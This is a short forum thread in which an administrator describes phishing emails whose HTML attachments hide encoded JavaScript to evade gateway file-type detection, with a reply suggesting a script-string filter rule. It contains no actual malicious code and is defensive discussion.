1 Reply Latest reply on Jun 30, 2016 10:04 AM by runcmd

    Problem with embedded and encoded Javascripts

    marcus69

      Hi all

       

      This week we've discovered some Mails with a nasty method how to sneak throught Email Gateway filters:

       

      Mails come in pretending to have an embedded excel Spreadsheet hiding behind an excel icon graphic.

      Behind that there is attached html-file that contains an embedded and encoded Javascript.

       

      xls-fake.jpg

      Here's an excerpt of the source code within the html file:

       

      sourcecode.jpg

       

      The Emailgateway does not detect any Javascript by filetype here, as it is a html/txt Document, and shows no offending code on the first glimpse.

      Unescaping the Codesequence reveals a Phishing Site on this case.

       

      In my opinion this is the prestep of the next Malware wave as this bypasses AV-Engine and Javascript Filetype detection.

      If these mails manage to get pass the Antispam and Reputationfilters, and You have no Webgateway or Advanced Threat Defense, You're may be doomed.

       

      Best Regards,

         Marcus

       

      PS: Did some enhanced Testing on this. One solution can be to filter HTML attachments by Filetype. HTML Email Content is not affected on this, only attachments.

        • 1. Re: Problem with embedded and encoded Javascripts
          runcmd

          I might be a day late and a dollar short on this one, but...  If you create a custom compliance dictionary that applies to everything and contains the strings "<script" and/or "</script>", and then add that dictionary to the "Spam Terms" component of the anti-spam settings for your inbound mail rule, wouldn't that help stop these?  That should block anything inbound that appears to contain a script.  (Unless you actually do need to receive some messages containing scripts.)